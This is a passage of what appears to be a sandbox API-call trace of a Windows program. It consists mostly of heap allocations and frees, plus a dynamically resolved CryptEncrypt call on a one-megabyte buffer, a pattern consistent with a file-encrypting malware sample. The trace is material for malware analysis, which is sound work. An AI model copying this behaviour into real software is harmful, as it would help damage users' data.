Flags=0x0, Size=0x10) returned 0x2e50740 [0198.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0198.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0198.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0198.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0198.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0198.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0198.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0198.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0198.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0198.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0198.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0198.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0198.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0198.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0198.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0198.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0198.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0198.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0198.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1298020 [0198.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0198.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1298020 | out: hHeap=0x970000) returned 1 [0198.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0198.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0198.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0198.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0198.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0198.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0198.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0198.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0198.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0198.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0198.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0198.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0198.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0198.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0198.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0198.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0198.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0198.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0198.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0198.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0198.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0198.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0198.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0198.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0198.438] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0198.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0198.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0198.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0198.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0198.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0198.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0198.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0198.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0198.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0198.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0198.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0198.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0198.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0198.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0198.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0198.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0198.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0198.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0198.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0198.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0198.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0198.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0198.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0198.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0198.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0198.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0198.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0198.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0198.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0198.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0198.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0198.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0198.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0198.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0198.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0198.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0198.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0198.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0198.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0198.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0198.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0198.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0198.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0198.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0198.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0198.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0198.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0198.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0198.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0198.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0198.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0198.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0198.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0198.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0198.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0198.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0198.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0198.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0198.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0198.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0198.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0198.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0198.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0198.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0198.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0198.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0198.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0198.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50ae8 [0198.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ae8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0198.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0198.442] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0198.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0198.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0198.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e543f0 [0198.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0198.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0198.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0198.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0198.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0198.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0198.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0198.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0198.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0198.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0198.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0198.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0198.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0198.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0198.443] CryptEncrypt (in: hKey=0xa86f50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1186020*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x100000 | out: pbData=0x1186020*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0198.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0198.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0198.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0198.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0198.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0198.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0198.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0198.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0198.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0198.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0198.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0198.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0198.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0198.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0198.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0198.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0198.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0198.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0198.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0198.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0198.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0198.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0198.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0198.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0198.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0198.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0198.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0198.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0198.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0198.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0198.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0198.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0198.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0198.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0198.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0198.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0198.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0198.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0198.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0198.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0198.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0198.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0198.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0198.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0198.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0198.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0198.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0198.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0198.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0198.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0198.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0198.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0198.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0198.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0198.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0198.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0198.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0198.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0198.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0198.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0198.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0198.523] HeapFree (in: hHeap=0x970000, 